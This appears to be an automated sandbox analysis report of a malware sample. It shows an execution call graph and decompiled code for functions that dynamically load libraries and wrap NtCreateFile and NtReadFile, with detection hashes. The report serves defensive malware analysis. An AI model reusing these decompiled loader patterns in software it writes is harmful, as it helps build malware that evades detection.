                                                                                            Total number of Nodes:647
                                                                                            Total number of Limit Nodes:83
                                                                                            execution_graph 31430 420193 31433 41e853 31430->31433 31438 41f2a3 31433->31438 31435 41e86f 31442 ab9a00 LdrInitializeThunk 31435->31442 31436 41e88a 31439 41f328 31438->31439 31441 41f2b2 31438->31441 31439->31435 31441->31439 31443 419653 31441->31443 31442->31436 31444 419661 31443->31444 31445 41966d 31443->31445 31444->31445 31448 419ad3 LdrLoadDll 31444->31448 31445->31439 31447 4197bf 31447->31439 31448->31447 31449 4015e2 31450 4015ec 31449->31450 31454 423493 31450->31454 31457 423481 31450->31457 31451 401822 31455 42349e 31454->31455 31460 41fcd3 31454->31460 31455->31451 31458 41fcd3 22 API calls 31457->31458 31459 42349e 31458->31459 31459->31451 31461 41fcf9 31460->31461 31474 40bf43 31461->31474 31463 41fd05 31473 41fd69 31463->31473 31482 410153 31463->31482 31465 41fd24 31466 41fd37 31465->31466 31494 410113 31465->31494 31469 41fd4c 31466->31469 31504 41e983 31466->31504 31500 4035b3 31469->31500 31471 41fd5b 31472 41e983 2 API calls 31471->31472 31472->31473 31473->31455 31507 40be93 31474->31507 31476 40bf50 31477 40bf57 31476->31477 31519 40be33 31476->31519 31477->31463 31483 41017f 31482->31483 31929 40d483 31483->31929 31485 410191 31933 410023 31485->31933 31488 4101ac 31489 4101b7 31488->31489 31492 41e763 2 API calls 31488->31492 31489->31465 31490 4101d5 31490->31465 31491 4101c4 31491->31490 31493 41e763 2 API calls 31491->31493 31492->31489 31493->31490 31495 410132 31494->31495 31496 419653 LdrLoadDll 31494->31496 31497 410139 31495->31497 31498 41013b GetUserGeoID 31495->31498 31496->31495 31497->31466 31499 410141 31498->31499 31499->31466 31501 4035e9 31500->31501 31503 403617 31501->31503 31952 40de13 31501->31952 31503->31471 31505 41e9a2 ExitProcess 31504->31505 31506 41f2a3 LdrLoadDll 31504->31506 31506->31505 31539 41cf03 31507->31539 31511 40beb9 31511->31476 31512 40beaf 31512->31511 31546 41f623 31512->31546 31514 40bef6 31514->31511 31557 40bcd3 31514->31557 31516 40bf16 31563 40b733 LdrLoadDll 31516->31563 31518 40bf28 31518->31476 31520 40be4b 31519->31520 31904 41f913 31520->31904 31523 41f913 LdrLoadDll 31524 40be64 31523->31524 31525 41f913 LdrLoadDll 31524->31525 31526 40be7d 31525->31526 31527 40ff13 31526->31527 31528 40ff2c 31527->31528 31912 40d303 31528->31912 31530 40ff3f 31916 41e4b3 31530->31916 31533 40bf68 31533->31463 31535 40ff65 31538 40ff90 31535->31538 31922 41e533 31535->31922 31536 41e763 2 API calls 31536->31533 31538->31536 31540 41cf12 31539->31540 31541 419653 LdrLoadDll 31540->31541 31542 40bea6 31541->31542 31543 41cdd3 31542->31543 31564 41e8d3 31543->31564 31547 41f63c 31546->31547 31567 419243 31547->31567 31549 41f654 31550 41f65d 31549->31550 31606 41f463 31549->31606 31550->31514 31552 41f671 31552->31550 31623 41e1d3 31552->31623 31554 41f6a5 31628 4201d3 31554->31628 31882 4094c3 31557->31882 31559 40bcf4 31559->31516 31560 40bced 31560->31559 31895 409783 31560->31895 31563->31518 31565 41f2a3 LdrLoadDll 31564->31565 31566 41cde8 31565->31566 31566->31512 31568 419586 31567->31568 31569 419257 31567->31569 31568->31549 31569->31568 31631 41df23 31569->31631 31572 419388 31634 41e633 31572->31634 31573 41936b 31691 41e733 LdrLoadDll 31573->31691 31576 419375 31576->31549 31577 4193af 31578 4201d3 2 API calls 31577->31578 31581 4193bb 31578->31581 31579 41954a 31582 41e763 2 API calls 31579->31582 31580 419560 31700 418f73 LdrLoadDll NtReadFile NtClose 31580->31700 31581->31576 31581->31579 31581->31580 31586 419453 31581->31586 31583 419551 31582->31583 31583->31549 31585 419573 31585->31549 31587 4194ba 31586->31587 31589 419462 31586->31589 31587->31579 31588 4194cd 31587->31588 31693 41e5b3 31588->31693 31591 419467 31589->31591 31592 41947b 31589->31592 31692 418e33 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31591->31692 31594 419480 31592->31594 31595 419498 31592->31595 31637 418ed3 31594->31637 31595->31583 31649 418bf3 31595->31649 31597 419471 31597->31549 31600 41952d 31697 41e763 31600->31697 31601 41948e 31601->31549 31604 4194b0 31604->31549 31605 419539 31605->31549 31608 41f47e 31606->31608 31607 41f490 31607->31552 31608->31607 31718 420153 31608->31718 31610 41f4b0 31721 418853 31610->31721 31612 41f4d3 31612->31607 31613 418853 3 API calls 31612->31613 31616 41f4f5 31613->31616 31615 41f57d 31617 41f58d 31615->31617 31848 41f223 LdrLoadDll 31615->31848 31616->31607 31753 419ba3 31616->31753 31764 41f093 31617->31764 31620 41f5bb 31843 41e193 31620->31843 31622 41f5e5 31622->31552 31624 41e1ef 31623->31624 31625 41f2a3 LdrLoadDll 31623->31625 31876 ab967a 31624->31876 31625->31624 31626 41e20a 31626->31554 31879 41e943 31628->31879 31630 41f6cf 31630->31514 31632 41f2a3 LdrLoadDll 31631->31632 31633 41933c 31632->31633 31633->31572 31633->31573 31633->31576 31635 41f2a3 LdrLoadDll 31634->31635 31636 41e64f NtCreateFile 31635->31636 31636->31577 31638 418ed6 31637->31638 31639 41e5b3 LdrLoadDll 31638->31639 31640 418f10 31639->31640 31641 418f17 31640->31641 31642 418f2b 31640->31642 31644 41e763 2 API calls 31641->31644 31643 41e763 2 API calls 31642->31643 31645 418f34 31643->31645 31646 418f20 31644->31646 31648 418f3f 31645->31648 31701 4202f3 LdrLoadDll RtlAllocateHeap 31645->31701 31646->31601 31648->31601 31650 418c71 31649->31650 31651 418c3e 31649->31651 31653 418db9 31650->31653 31657 418c8d 31650->31657 31652 41e5b3 LdrLoadDll 31651->31652 31655 418c59 31652->31655 31654 41e5b3 LdrLoadDll 31653->31654 31661 418dd4 31654->31661 31656 41e763 2 API calls 31655->31656 31658 418c62 31656->31658 31659 41e5b3 LdrLoadDll 31657->31659 31658->31604 31660 418ca8 31659->31660 31663 418cc4 31660->31663 31664 418caf 31660->31664 31714 41e5f3 LdrLoadDll 31661->31714 31667 418cc9 31663->31667 31668 418cdf 31663->31668 31666 41e763 2 API calls 31664->31666 31665 418e0e 31669 41e763 2 API calls 31665->31669 31670 418cb8 31666->31670 31671 41e763 2 API calls 31667->31671 31677 418ce4 31668->31677 31702 4202b3 31668->31702 31672 418e19 31669->31672 31670->31604 31673 418cd2 31671->31673 31672->31604 31673->31604 31676 418d47 31678 418d5e 31676->31678 31713 41e573 LdrLoadDll 31676->31713 31684 418cf3 31677->31684 31705 41e6e3 31677->31705 31680 418d65 31678->31680 31681 418d7a 31678->31681 31682 41e763 2 API calls 31680->31682 31683 41e763 2 API calls 31681->31683 31682->31684 31685 418d83 31683->31685 31684->31604 31686 418daf 31685->31686 31708 41ffd3 31685->31708 31686->31604 31688 418d9a 31689 4201d3 2 API calls 31688->31689 31690 418da3 31689->31690 31690->31604 31691->31576 31692->31597 31694 41f2a3 LdrLoadDll 31693->31694 31695 419515 31694->31695 31696 41e5f3 LdrLoadDll 31695->31696 31696->31600 31698 41f2a3 LdrLoadDll 31697->31698 31699 41e77f NtClose 31698->31699 31699->31605 31700->31585 31701->31648 31715 41e903 31702->31715 31704 4202cb 31704->31677 31706 41e6ff NtReadFile 31705->31706 31707 41f2a3 LdrLoadDll 31705->31707 31706->31676 31707->31706 31709 41ffe0 31708->31709 31710 41fff7 31708->31710 31709->31710 31711 4202b3 2 API calls 31709->31711 31710->31688 31712 42000e 31711->31712 31712->31688 31713->31678 31714->31665 31716 41f2a3 LdrLoadDll 31715->31716 31717 41e91f RtlAllocateHeap 31716->31717 31717->31704 31849 41e813 31718->31849 31720 420180 31720->31610 31722 418864 31721->31722 31723 41886c 31721->31723 31722->31612 31752 418b3f 31723->31752 31852 421353 31723->31852 31725 4188c0 31726 421353 2 API calls 31725->31726 31729 4188cb 31726->31729 31727 418919 31730 421353 2 API calls 31727->31730 31729->31727 31731 421483 3 API calls 31729->31731 31863 4213f3 LdrLoadDll RtlAllocateHeap RtlFreeHeap 31729->31863 31733 41892d 31730->31733 31731->31729 31732 41898a 31734 421353 2 API calls 31732->31734 31733->31732 31857 421483 31733->31857 31737 4189a0 31734->31737 31736 4189dd 31738 421353 2 API calls 31736->31738 31737->31736 31739 421483 3 API calls 31737->31739 31740 4189e8 31738->31740 31739->31737 31741 421483 3 API calls 31740->31741 31748 418a22 31740->31748 31741->31740 31743 418b17 31865 4213b3 LdrLoadDll RtlFreeHeap 31743->31865 31745 418b21 31866 4213b3 LdrLoadDll RtlFreeHeap 31745->31866 31747 418b2b 31867 4213b3 LdrLoadDll RtlFreeHeap 31747->31867 31864 4213b3 LdrLoadDll RtlFreeHeap 31748->31864 31750 418b35 31868 4213b3 LdrLoadDll RtlFreeHeap 31750->31868 31752->31612 31754 419bb4 31753->31754 31755 419243 8 API calls 31754->31755 31757 419bca 31755->31757 31756 419bd3 31756->31615 31757->31756 31758 419c07 31757->31758 31761 419c53 31757->31761 31759 4201d3 2 API calls 31758->31759 31760 419c18 31759->31760 31760->31615 31762 4201d3 2 API calls 31761->31762 31763 419c58 31762->31763 31763->31615 31765 41f0a7 31764->31765 31766 41ef23 LdrLoadDll 31764->31766 31869 41ef23 31765->31869 31766->31765 31768 41f0b0 31769 41ef23 LdrLoadDll 31768->31769 31770 41f0b9 31769->31770 31771 41ef23 LdrLoadDll 31770->31771 31772 41f0c2 31771->31772 31773 41ef23 LdrLoadDll 31772->31773 31774 41f0cb 31773->31774 31775 41ef23 LdrLoadDll 31774->31775 31776 41f0d4 31775->31776 31777 41ef23 LdrLoadDll 31776->31777 31778 41f0e0 31777->31778 31779 41ef23 LdrLoadDll 31778->31779 31780 41f0e9 31779->31780 31781 41ef23 LdrLoadDll 31780->31781 31782 41f0f2 31781->31782 31783 41ef23 LdrLoadDll 31782->31783 31784 41f0fb 31783->31784 31785 41ef23 LdrLoadDll 31784->31785 31786 41f104 31785->31786 31787 41ef23 LdrLoadDll 31786->31787 31788 41f10d 31787->31788 31789 41ef23 LdrLoadDll 31788->31789 31790 41f119 31789->31790 31791 41ef23 LdrLoadDll 31790->31791 31792 41f122 31791->31792 31793 41ef23 LdrLoadDll 31792->31793 31794 41f12b 31793->31794 31795 41ef23 LdrLoadDll 31794->31795 31796 41f134 31795->31796 31797 41ef23 LdrLoadDll 31796->31797 31798 41f13d 31797->31798 31799 41ef23 LdrLoadDll 31798->31799 31800 41f146 31799->31800 31801 41ef23 LdrLoadDll 31800->31801 31802 41f152 31801->31802 31803 41ef23 LdrLoadDll 31802->31803 31804 41f15b 31803->31804 31805 41ef23 LdrLoadDll 31804->31805 31806 41f164 31805->31806 31807 41ef23 LdrLoadDll 31806->31807 31808 41f16d 31807->31808 31809 41ef23 LdrLoadDll 31808->31809 31810 41f176 31809->31810 31811 41ef23 LdrLoadDll 31810->31811 31812 41f17f 31811->31812 31813 41ef23 LdrLoadDll 31812->31813 31814 41f18b 31813->31814 31815 41ef23 LdrLoadDll 31814->31815 31816 41f194 31815->31816 31817 41ef23 LdrLoadDll 31816->31817 31818 41f19d 31817->31818 31819 41ef23 LdrLoadDll 31818->31819 31820 41f1a6 31819->31820 31821 41ef23 LdrLoadDll 31820->31821 31822 41f1af 31821->31822 31823 41ef23 LdrLoadDll 31822->31823 31824 41f1b8 31823->31824 31825 41ef23 LdrLoadDll 31824->31825 31826 41f1c4 31825->31826 31827 41ef23 LdrLoadDll 31826->31827 31828 41f1cd 31827->31828 31829 41ef23 LdrLoadDll 31828->31829 31830 41f1d6 31829->31830 31831 41ef23 LdrLoadDll 31830->31831 31832 41f1df 31831->31832 31833 41ef23 LdrLoadDll 31832->31833 31834 41f1e8 31833->31834 31835 41ef23 LdrLoadDll 31834->31835 31836 41f1f1 31835->31836 31837 41ef23 LdrLoadDll 31836->31837 31838 41f1fd 31837->31838 31839 41ef23 LdrLoadDll 31838->31839 31840 41f206 31839->31840 31841 41ef23 LdrLoadDll 31840->31841 31842 41f20f 31841->31842 31842->31620 31844 41f2a3 LdrLoadDll 31843->31844 31845 41e1af 31844->31845 31875 ab9860 LdrInitializeThunk 31845->31875 31846 41e1c6 31846->31622 31848->31617 31850 41f2a3 LdrLoadDll 31849->31850 31851 41e82f NtAllocateVirtualMemory 31850->31851 31851->31720 31853 421363 31852->31853 31854 421369 31852->31854 31853->31725 31855 4202b3 2 API calls 31854->31855 31856 42138f 31855->31856 31856->31725 31858 4213f3 31857->31858 31859 421450 31858->31859 31860 4202b3 2 API calls 31858->31860 31859->31733 31861 42142d 31860->31861 31862 4201d3 2 API calls 31861->31862 31862->31859 31863->31729 31864->31743 31865->31745 31866->31747 31867->31750 31868->31752 31870 41ef3e 31869->31870 31871 419653 LdrLoadDll 31870->31871 31872 41ef5e 31871->31872 31873 419653 LdrLoadDll 31872->31873 31874 41f012 31872->31874 31873->31874 31874->31768 31874->31874 31875->31846 31877 ab968f LdrInitializeThunk 31876->31877 31878 ab9681 31876->31878 31877->31626 31878->31626 31880 41f2a3 LdrLoadDll 31879->31880 31881 41e95f RtlFreeHeap 31880->31881 31881->31630 31883 4094d3 31882->31883 31884 4094ce 31882->31884 31885 420153 2 API calls 31883->31885 31884->31560 31888 4094f8 31885->31888 31886 40955b 31886->31560 31887 41e193 2 API calls 31887->31888 31888->31886 31888->31887 31889 409561 31888->31889 31893 420153 2 API calls 31888->31893 31898 41e893 31888->31898 31891 409587 31889->31891 31892 41e893 2 API calls 31889->31892 31891->31560 31894 409578 31892->31894 31893->31888 31894->31560 31896 41e893 2 API calls 31895->31896 31897 4097a1 31896->31897 31897->31516 31899 41f2a3 LdrLoadDll 31898->31899 31900 41e8af 31899->31900 31903 ab96e0 LdrInitializeThunk 31900->31903 31901 41e8c6 31901->31888 31903->31901 31905 41f936 31904->31905 31908 40cfb3 31905->31908 31909 40cfd7 31908->31909 31910 40d013 LdrLoadDll 31909->31910 31911 40be50 31909->31911 31910->31911 31911->31523 31913 40d326 31912->31913 31915 40d3a0 31913->31915 31927 41df63 LdrLoadDll 31913->31927 31915->31530 31917 41f2a3 LdrLoadDll 31916->31917 31918 40ff4e 31917->31918 31918->31533 31919 41eaa3 31918->31919 31920 41eac2 LookupPrivilegeValueW 31919->31920 31921 41f2a3 LdrLoadDll 31919->31921 31920->31535 31921->31920 31923 41e54f 31922->31923 31924 41f2a3 LdrLoadDll 31922->31924 31928 ab9910 LdrInitializeThunk 31923->31928 31924->31923 31925 41e56e 31925->31538 31927->31915 31928->31925 31930 40d4aa 31929->31930 31931 40d303 LdrLoadDll 31930->31931 31932 40d50d 31931->31932 31932->31485 31934 41003d 31933->31934 31942 4100f3 31933->31942 31935 40d303 LdrLoadDll 31934->31935 31936 41005f 31935->31936 31943 41e213 31936->31943 31938 4100a1 31946 41e253 31938->31946 31941 41e763 2 API calls 31941->31942 31942->31488 31942->31491 31944 41e22f 31943->31944 31945 41f2a3 LdrLoadDll 31943->31945 31944->31938 31945->31944 31947 41e26f 31946->31947 31948 41f2a3 LdrLoadDll 31946->31948 31951 ab9fe0 LdrInitializeThunk 31947->31951 31948->31947 31949 4100e7 31949->31941 31951->31949 31953 40de3e 31952->31953 31954 40d483 LdrLoadDll 31953->31954 31955 40de95 31954->31955 31988 40d103 31955->31988 31957 40e10c 31957->31503 31958 40debb 31958->31957 31997 418b83 31958->31997 31960 40df00 31960->31957 32000 40a0f3 31960->32000 31962 40df44 31962->31957 32022 41e7d3 31962->32022 31966 40df9a 31967 40dfa1 31966->31967 32035 41e2e3 31966->32035 31968 4201d3 2 API calls 31967->31968 31970 40dfae 31968->31970 31970->31503 31972 40dfeb 31973 4201d3 2 API calls 31972->31973 31974 40dff2 31973->31974 31974->31503 31975 40dffb 31976 4101e3 3 API calls 31975->31976 31977 40e06f 31976->31977 31977->31967 31978 40e07a 31977->31978 31979 4201d3 2 API calls 31978->31979 31980 40e09e 31979->31980 32040 41e333 31980->32040 31983 41e2e3 2 API calls 31984 40e0d9 31983->31984 31984->31957 32045 41e0f3 31984->32045 31987 41e983 2 API calls 31987->31957 31989 40d110 31988->31989 31990 40d114 31988->31990 31989->31958 31991 40d12d 31990->31991 31992 40d15f 31990->31992 32050 41dfa3 LdrLoadDll 31991->32050 32051 41dfa3 LdrLoadDll 31992->32051 31994 40d170 31994->31958 31996 40d14f 31996->31958 31998 4101e3 3 API calls 31997->31998 31999 418ba9 31998->31999 31999->31960 32052 40a323 32000->32052 32002 40a319 32002->31962 32003 40a111 32003->32002 32004 4094c3 4 API calls 32003->32004 32005 40a1ef 32003->32005 32015 40a14f 32004->32015 32005->32002 32006 40a2cf 32005->32006 32007 4094c3 4 API calls 32005->32007 32006->32002 32099 410453 10 API calls 32006->32099 32019 40a22c 32007->32019 32009 40a2e3 32009->32002 32100 410453 10 API calls 32009->32100 32011 40a2f9 32011->32002 32101 410453 10 API calls 32011->32101 32013 40a30f 32013->31962 32015->32005 32016 40a1e5 32015->32016 32066 409dd3 32015->32066 32018 409783 2 API calls 32016->32018 32017 409dd3 14 API calls 32017->32019 32018->32005 32019->32006 32019->32017 32020 40a2c5 32019->32020 32021 409783 2 API calls 32020->32021 32021->32006 32023 41e7dc 32022->32023 32024 41f2a3 LdrLoadDll 32023->32024 32025 41e7ef 32024->32025 32184 ab98f0 LdrInitializeThunk 32025->32184 32026 40df7b 32028 4101e3 32026->32028 32029 410200 32028->32029 32185 41e293 32029->32185 32032 410248 32032->31966 32033 41e2e3 2 API calls 32034 410271 32033->32034 32034->31966 32036 41e2ff 32035->32036 32037 41f2a3 LdrLoadDll 32035->32037 32191 ab9780 LdrInitializeThunk 32036->32191 32037->32036 32038 40dfde 32038->31972 32038->31975 32041 41f2a3 LdrLoadDll 32040->32041 32042 41e34f 32041->32042 32192 ab97a0 LdrInitializeThunk 32042->32192 32043 40e0b2 32043->31983 32046 41f2a3 LdrLoadDll 32045->32046 32047 41e10f 32046->32047 32193 ab9a20 LdrInitializeThunk 32047->32193 32048 40e105 32048->31987 32050->31996 32051->31994 32053 40a34a 32052->32053 32054 4094c3 4 API calls 32053->32054 32061 40a5a2 32053->32061 32055 40a39d 32054->32055 32056 409783 2 API calls 32055->32056 32055->32061 32057 40a42c 32056->32057 32058 4094c3 4 API calls 32057->32058 32057->32061 32059 40a441 32058->32059 32060 409783 2 API calls 32059->32060 32059->32061 32064 40a4a1 32060->32064 32061->32003 32062 4094c3 4 API calls 32062->32064 32063 409dd3 14 API calls 32063->32064 32064->32061 32064->32062 32064->32063 32065 409783 2 API calls 32064->32065 32065->32064 32067 409df8 32066->32067 32102 41dfe3 32067->32102 32070 409e4c 32070->32015 32071 409ecd 32136 410333 LdrLoadDll NtClose 32071->32136 32072 41e1d3 2 API calls 32073 409e70 32072->32073 32073->32071 32075 409e7b 32073->32075 32081 409ef9 32075->32081 32106 40e123 32075->32106 32076 409ee8 32077 409eef 32076->32077 32082 409f05 32076->32082 32079 41e763 2 API calls 32077->32079 32079->32081 32080 409e95 32080->32081 32126 409c03 32080->32126 32081->32015 32137 41e063 LdrLoadDll 32082->32137 32084 409f30 32087 40e123 5 API calls 32084->32087 32088 409f50 32087->32088 32088->32081 32138 41e093 LdrLoadDll 32088->32138 32090 409f75 32139 41e123 LdrLoadDll 32090->32139 32092 409f8f 32093 41e0f3 2 API calls 32092->32093 32094 409f9e 32093->32094 32095 41e763 2 API calls 32094->32095 32096 409fa8 32095->32096 32140 4099d3 32096->32140 32098 409fbc 32098->32015 32099->32009 32100->32011 32101->32013 32103 41dff9 32102->32103 32104 409e42 32103->32104 32105 41f2a3 LdrLoadDll 32103->32105 32104->32070 32104->32071 32104->32072 32105->32104 32107 40e151 32106->32107 32108 4101e3 3 API calls 32107->32108 32109 40e1b0 32108->32109 32110 40e1f9 32109->32110 32111 41e2e3 2 API calls 32109->32111 32110->32080 32112 40e1db 32111->32112 32113 40e1e5 32112->32113 32117 40e205 32112->32117 32114 41e333 2 API calls 32113->32114 32115 40e1ef 32114->32115 32116 41e763 2 API calls 32115->32116 32116->32110 32118 40e272 32117->32118 32119 40e28f 32117->32119 32120 41e763 2 API calls 32118->32120 32121 41e333 2 API calls 32119->32121 32122 40e27c 32120->32122 32123 40e29e 32121->32123 32122->32080 32124 41e763 2 API calls 32123->32124 32125 40e2a8 32124->32125 32125->32080 32128 409c19 32126->32128 32127 409da4 32127->32015 32128->32127 32156 4097c3 32128->32156 32130 409d18 32130->32127 32131 4099d3 11 API calls 32130->32131 32132 409d46 32131->32132 32132->32127 32133 41e1d3 2 API calls 32132->32133 32134 409d7b 32133->32134 32134->32127 32135 41e7d3 2 API calls 32134->32135 32135->32127 32136->32076 32137->32084 32138->32090 32139->32092 32141 4099fc 32140->32141 32163 409933 32141->32163 32144 41e7d3 2 API calls 32145 409a0f 32144->32145 32145->32144 32146 409a9a 32145->32146 32148 409a95 32145->32148 32171 4103b3 32145->32171 32146->32098 32147 41e763 2 API calls 32149 409acd 32147->32149 32148->32147 32149->32146 32150 41dfe3 LdrLoadDll 32149->32150 32151 409b32 32150->32151 32151->32146 32175 41e023 32151->32175 32153 409b96 32153->32146 32154 419243 8 API calls 32153->32154 32155 409beb 32154->32155 32155->32098 32157 4098c2 32156->32157 32158 4097d8 32156->32158 32157->32130 32158->32157 32159 419243 8 API calls 32158->32159 32160 409845 32159->32160 32161 4201d3 2 API calls 32160->32161 32162 40986c 32160->32162 32161->32162 32162->32130 32164 40994d 32163->32164 32165 40cfb3 LdrLoadDll 32164->32165 32166 409968 32165->32166 32167 419653 LdrLoadDll 32166->32167 32168 409980 32167->32168 32169 409989 PostThreadMessageW 32168->32169 32170 40999c 32168->32170 32169->32170 32170->32145 32172 4103c6 32171->32172 32178 41e163 32172->32178 32176 41e03f 32175->32176 32177 41f2a3 LdrLoadDll 32175->32177 32176->32153 32177->32176 32179 41e17f 32178->32179 32180 41f2a3 LdrLoadDll 32178->32180 32183 ab9840 LdrInitializeThunk 32179->32183 32180->32179 32181 4103f1 32181->32145 32183->32181 32184->32026 32186 41f2a3 LdrLoadDll 32185->32186 32187 41e2af 32186->32187 32190 ab99a0 LdrInitializeThunk 32187->32190 32188 410241 32188->32032 32188->32033 32190->32188 32191->32038 32192->32043 32193->32048 32194 40b573 32195 40b598 32194->32195 32196 40cfb3 LdrLoadDll 32195->32196 32197 40b5cb 32196->32197 32199 40b5f0 32197->32199 32200 40eb73 32197->32200 32201 40eb9f 32200->32201 32202 41e4b3 LdrLoadDll 32201->32202 32203 40ebb8 32202->32203 32204 40ebbf 32203->32204 32211 41e4f3 32203->32211 32204->32199 32208 40ebfa 32209 41e763 2 API calls 32208->32209 32210 40ec1d 32209->32210 32210->32199 32212 41e50f 32211->32212 32213 41f2a3 LdrLoadDll 32211->32213 32217 ab9710 LdrInitializeThunk 32212->32217 32213->32212 32214 40ebe2 32214->32204 32216 41eae3 LdrLoadDll 32214->32216 32216->32208 32217->32214 32220 ab9540 LdrInitializeThunk

                                                                                            Executed Functions

                                                                                            Function 0040CFB3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 213 40cfb3-40cfdc call 420f73 216 40cfe2-40cff0 call 421493 213->216 217 40cfde-40cfe1 213->217 220 40d000-40d011 call 41f813 216->220 221 40cff2-40cffd call 421713 216->221 226 40d013-40d027 LdrLoadDll 220->226 227 40d02a-40d02d 220->227 221->220 226->227
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040CFB3(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420F73( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00421493(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421713( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F813(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                            0x0040cfcf
                                                                                            0x0040cfd2
                                                                                            0x0040cfd7
                                                                                            0x0040cfdc
                                                                                            0x0040cfe6
                                                                                            0x0040cfeb
                                                                                            0x0040cfee
                                                                                            0x0040cff0
                                                                                            0x0040cff8
                                                                                            0x0040cffd
                                                                                            0x0040cffd
                                                                                            0x0040d004
                                                                                            0x0040d00c
                                                                                            0x0040d00f
                                                                                            0x0040d011
                                                                                            0x0040d025
                                                                                            0x00000000
                                                                                            0x0040d027
                                                                                            0x0040d02d
                                                                                            0x0040cfe1
                                                                                            0x0040cfe1
                                                                                            0x0040cfe1

                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040D025
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: 76fbf0a0d41d2f9fdeeb2fef896e37cba020f83aa89faf49bba1f5bcdbe8aaae
                                                                                            • Instruction ID: f6a6334d78f3db5092128710384f16fd22c590b61b09d0d5e41196b5070580b0
                                                                                            • Opcode Fuzzy Hash: 76fbf0a0d41d2f9fdeeb2fef896e37cba020f83aa89faf49bba1f5bcdbe8aaae
                                                                                            • Instruction Fuzzy Hash: 050152B1E4010DBBDF10DBE1DC42FDEB3789B54308F0041A6E908A7281F635EB098795
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041E633 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 236 41e633-41e684 call 41f2a3 NtCreateFile
                                                                                            C-Code - Quality: 100%
                                                                                            			E0041E633(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F2A3( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                                            0x0041e642
                                                                                            0x0041e64a
                                                                                            0x0041e680
                                                                                            0x0041e684

                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00000000,?,004193AF,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,004193AF,?,00000000,00000060,00000000,00000000), ref: 0041E680
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.306509609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_gkvlc.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                            • Instruction ID: 89d588e123aea2c84b240fa7b1f1f951c982435e2be9e119076597f97947aa81
                                                                                            • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                            • Instruction Fuzzy Hash: FCF0BDB2214208ABCB08CF89DC85EEB37ADAF8C754F018248BA0D97241C630E8518BA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041E6DD Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 239 41e6dd-41e72c call 41f2a3 NtReadFile
                                                                                            C-Code - Quality: 37%
                                                                                            			E0041E6DD(void* __eax, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _t19;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				_t14 = _v4;
				_t3 = _t14 + 0xa74; // 0xa76
				_t30 = _t3;
				E0041F2A3( *((intOrPtr*)(_v4 + 0x14)), _t14, _t30,  *((intOrPtr*)(_v4 + 0x14)), 0, 0x2a);
				_t19 =  *((intOrPtr*)( *_t30))(_v0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _t29, _t32, cs, __edi); // executed
				return _t19;
			}









                                                                                            0x0041e6e6
                                                                                            0x0041e6f2
                                                                                            0x0041e6f2
                                                                                            0x0041e6fa
                                                                                            0x0041e728
                                                                                            0x0041e72c

                                                                                            APIs
